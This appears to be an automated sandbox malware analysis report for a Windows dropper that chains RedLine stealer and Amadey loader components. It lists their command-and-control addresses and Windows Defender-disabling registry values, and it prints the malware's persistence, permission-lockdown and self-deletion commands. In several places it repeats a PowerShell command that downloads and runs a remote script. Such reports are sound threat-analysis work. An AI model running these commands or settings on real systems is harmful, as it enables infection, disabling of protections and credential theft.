Analysis
-
max time kernel
149s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2023, 03:28
Static task
static1
General
-
Target
1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe
-
Size
962KB
-
MD5
016ef580cfa12140bb52ad8f4f58661f
-
SHA1
d6b7d6c9a658f17486eaa01e6d633ab2c7bd7486
-
SHA256
1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f
-
SHA512
0fbf673260b4c3917d41062cb27f317f3450d0defcb88be474d06b10af681f2167355ca666cceea394b4704b43b1cbed34eadf13d96bcaec9c2bad00e6eccbce
-
SSDEEP
24576:PyY3DMYFZcr7SwGTQMj5/qlziqBVqEMp:a8aShQMjJeVq7
Malware Config
Extracted
https://www.mdegmm.com/pdf/debug2.ps1
Extracted
redline
gena
193.233.20.30:4125
-
auth_value
93c20961cb6b06b2d5781c212db6201e
Extracted
redline
vint
193.233.20.30:4125
-
auth_value
fb8811912f8370b3d23bffda092d88d0
Extracted
amadey
3.68
62.204.41.87/joomla/index.php
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" tz7915.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" tz7915.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" tz7915.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" tz7915.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection tz7915.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" tz7915.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection v5921GZ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" v5921GZ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" v5921GZ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" v5921GZ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" v5921GZ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" v5921GZ.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 18 IoCs
resource yara_rule behavioral1/memory/3288-209-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-210-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-214-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-216-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-218-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-220-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-222-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-224-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-226-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-228-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-230-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-232-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-234-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-236-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-238-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-240-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-242-0x0000000002650000-0x000000000268E000-memory.dmp family_redline behavioral1/memory/3288-244-0x0000000002650000-0x000000000268E000-memory.dmp family_redline -
Blocklisted process makes network request 6 IoCs
flow pid Process 73 3096 powershell.exe 74 4216 powershell.exe 76 3096 powershell.exe 77 4216 powershell.exe 78 2084 powershell.exe 80 2084 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation y15zQ95.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation legenda.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation sqlcmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation sqlcmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation sqlcmd.exe -
Executes dropped EXE 14 IoCs
pid Process 4292 zap0222.exe 5080 zap1855.exe 548 zap3260.exe 4564 tz7915.exe 1832 v5921GZ.exe 3288 w18sW65.exe 3116 xMOYn49.exe 4416 y15zQ95.exe 4180 legenda.exe 3520 sqlcmd.exe 1576 sqlcmd.exe 5116 sqlcmd.exe 772 legenda.exe 3872 legenda.exe -
Loads dropped DLL 1 IoCs
pid Process 3728 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" tz7915.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features v5921GZ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" v5921GZ.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" zap1855.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap3260.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" zap3260.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap0222.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" zap0222.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap1855.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 3376 1832 WerFault.exe 93 4080 3288 WerFault.exe 97 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 772 schtasks.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 4944 PING.EXE 2980 PING.EXE 4992 PING.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4564 tz7915.exe 4564 tz7915.exe 1832 v5921GZ.exe 1832 v5921GZ.exe 3288 w18sW65.exe 3288 w18sW65.exe 3116 xMOYn49.exe 3116 xMOYn49.exe 3096 powershell.exe 3096 powershell.exe 4216 powershell.exe 4216 powershell.exe 4216 powershell.exe 2084 powershell.exe 2084 powershell.exe 2084 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4564 tz7915.exe Token: SeDebugPrivilege 1832 v5921GZ.exe Token: SeDebugPrivilege 3288 w18sW65.exe Token: SeDebugPrivilege 3116 xMOYn49.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 2084 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1796 wrote to memory of 4292 1796 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe 83 PID 1796 wrote to memory of 4292 1796 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe 83 PID 1796 wrote to memory of 4292 1796 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe 83 PID 4292 wrote to memory of 5080 4292 zap0222.exe 84 PID 4292 wrote to memory of 5080 4292 zap0222.exe 84 PID 4292 wrote to memory of 5080 4292 zap0222.exe 84 PID 5080 wrote to memory of 548 5080 zap1855.exe 85 PID 5080 wrote to memory of 548 5080 zap1855.exe 85 PID 5080 wrote to memory of 548 5080 zap1855.exe 85 PID 548 wrote to memory of 4564 548 zap3260.exe 86 PID 548 wrote to memory of 4564 548 zap3260.exe 86 PID 548 wrote to memory of 1832 548 zap3260.exe 93 PID 548 wrote to memory of 1832 548 zap3260.exe 93 PID 548 wrote to memory of 1832 548 zap3260.exe 93 PID 5080 wrote to memory of 3288 5080 zap1855.exe 97 PID 5080 wrote to memory of 3288 5080 zap1855.exe 97 PID 5080 wrote to memory of 3288 5080 zap1855.exe 97 PID 4292 wrote to memory of 3116 4292 zap0222.exe 111 PID 4292 wrote to memory of 3116 4292 zap0222.exe 111 PID 4292 wrote to memory of 3116 4292 zap0222.exe 111 PID 1796 wrote to memory of 4416 1796 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe 114 PID 1796 wrote to memory of 4416 1796 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe 114 PID 1796 wrote to memory of 4416 1796 1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe 114 PID 4416 wrote to memory of 4180 4416 y15zQ95.exe 115 PID 4416 wrote to memory of 4180 4416 y15zQ95.exe 115 PID 4416 wrote to memory of 4180 4416 y15zQ95.exe 115 PID 4180 wrote to memory of 772 4180 legenda.exe 116 PID 4180 wrote to memory of 772 4180 legenda.exe 116 PID 4180 wrote to memory of 772 4180 legenda.exe 116 PID 4180 wrote to memory of 228 4180 legenda.exe 118 PID 4180 wrote to memory of 228 4180 legenda.exe 118 PID 4180 wrote to memory of 228 4180 legenda.exe 118 PID 228 wrote to memory of 4392 228 cmd.exe 120 PID 228 wrote to memory of 4392 228 cmd.exe 120 PID 228 wrote to memory of 4392 228 cmd.exe 120 PID 228 wrote to memory of 3532 228 cmd.exe 121 PID 228 wrote to memory of 3532 228 cmd.exe 121 PID 228 wrote to memory of 3532 228 cmd.exe 121 PID 228 wrote to memory of 652 228 cmd.exe 122 PID 228 wrote to memory of 652 228 cmd.exe 122 PID 228 wrote to memory of 652 228 cmd.exe 122 PID 228 wrote to memory of 1540 228 cmd.exe 123 PID 228 wrote to memory of 1540 228 cmd.exe 123 PID 228 wrote to memory of 1540 228 cmd.exe 123 PID 228 wrote to memory of 3912 228 cmd.exe 124 PID 228 wrote to memory of 3912 228 cmd.exe 124 PID 228 wrote to memory of 3912 228 cmd.exe 124 PID 228 wrote to memory of 3604 228 cmd.exe 125 PID 228 wrote to memory of 3604 228 cmd.exe 125 PID 228 wrote to memory of 3604 228 cmd.exe 125 PID 4180 wrote to memory of 3520 4180 legenda.exe 126 PID 4180 wrote to memory of 3520 4180 legenda.exe 126 PID 4180 wrote to memory of 3520 4180 legenda.exe 126 PID 3520 wrote to memory of 3476 3520 sqlcmd.exe 127 PID 3520 wrote to memory of 3476 3520 sqlcmd.exe 127 PID 4180 wrote to memory of 1576 4180 legenda.exe 129 PID 4180 wrote to memory of 1576 4180 legenda.exe 129 PID 4180 wrote to memory of 1576 4180 legenda.exe 129 PID 3476 wrote to memory of 3096 3476 cmd.exe 130 PID 3476 wrote to memory of 3096 3476 cmd.exe 130 PID 1576 wrote to memory of 3192 1576 sqlcmd.exe 131 PID 1576 wrote to memory of 3192 1576 sqlcmd.exe 131 PID 3192 wrote to memory of 4216 3192 cmd.exe 133 PID 3192 wrote to memory of 4216 3192 cmd.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe"C:\Users\Admin\AppData\Local\Temp\1c7996ec1ca5644f6c6def8fcb18b09cdb841e88debe31c9b5df90e781ee937f.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap0222.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap0222.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap1855.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap1855.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap3260.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap3260.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz7915.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz7915.exe5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v5921GZ.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v5921GZ.exe5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 10846⤵
- Program crash
PID:3376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w18sW65.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w18sW65.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3288 -s 13365⤵
- Program crash
PID:4080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xMOYn49.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xMOYn49.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y15zQ95.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y15zQ95.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F4⤵
- Creates scheduled task(s)
PID:772
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4392
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legenda.exe" /P "Admin:N"5⤵PID:3532
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legenda.exe" /P "Admin:R" /E5⤵PID:652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1540
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\f22b669919" /P "Admin:N"5⤵PID:3912
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\f22b669919" /P "Admin:R" /E5⤵PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe" >> NUL5⤵PID:4744
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe" >> NUL5⤵PID:3424
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:2980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000109001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000109001\sqlcmd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:5116 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵PID:2696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000109001\sqlcmd.exe" >> NUL5⤵PID:4416
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4992
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main4⤵
- Loads dropped DLL
PID:3728
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1832 -ip 18321⤵PID:1724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3288 -ip 32881⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exeC:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe1⤵
- Executes dropped EXE
PID:772
-
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exeC:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe1⤵
- Executes dropped EXE
PID:3872
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize2KB
MD5fc88b7748eb4cd37ae886a1c0813e4cf
SHA123e30b76fc94f0467a3efad342a91a3b84ff1eea
SHA2563d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da
SHA512bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize1KB
MD5cb684ec7fe8555f949182c7423dafdc2
SHA1ec49f7b4b777fa1da40af5328785782127ffc52c
SHA2568e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e
SHA512ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize482B
MD587873c343c190ad67bb90445994c60fa
SHA1f4b02402f405ae97c7420532aa48ab3c3273a413
SHA256ca43a6753cbcf483241a45465d08f27b174ccb7adc14607a86ff0fb41bc9288b
SHA512f4c6b58f1db34503dbb35e44f26af5df92a07be243538ab28f2c673f0ccb66d9016b12a52119c42c5952dc2c9497b4f73bea7a6e5c8a7c1529679f590bd11a48
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize486B
MD54a934053a12c337e75e59ba27bc65371
SHA10f2473cc8c8faf4ab4e2bf5ebe3a4dc6be9a79a6
SHA256835782a45cdf6599551ac16e0d5368d7234eeb62aff1d073e20a56102b8cd77e
SHA512857c514dc8faab3c7a29ff7bf6b9d496c7879b1f89831466ac82be2835327b777c13256c911c4abb7c58c4cadd58db988c0a6e28fb0b238ee32261fdc4720955
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
235KB
MD55086db99de54fca268169a1c6cf26122
SHA1003f768ffcc99bda5cda1fb966fda8625a8fdc3e
SHA25642873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4
SHA51290531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5
-
Filesize
235KB
MD55086db99de54fca268169a1c6cf26122
SHA1003f768ffcc99bda5cda1fb966fda8625a8fdc3e
SHA25642873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4
SHA51290531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5
-
Filesize
778KB
MD516edd78b2cb161880bd26090f25b371c
SHA123899600e9d4382e3f17303a4d775e6f4263b9cb
SHA256c35e333527bcdbca9f673b34badcecb77b82fed49675ad2257bdffa73425662e
SHA512bcf7a1ccd57d78579e4ec497c7cf4fa6da40557678fc210a743ef74fc54581c69481030142d635e0dba3d9ea5fabab45a246255dba3b34a9030bbf01a451e285
-
Filesize
778KB
MD516edd78b2cb161880bd26090f25b371c
SHA123899600e9d4382e3f17303a4d775e6f4263b9cb
SHA256c35e333527bcdbca9f673b34badcecb77b82fed49675ad2257bdffa73425662e
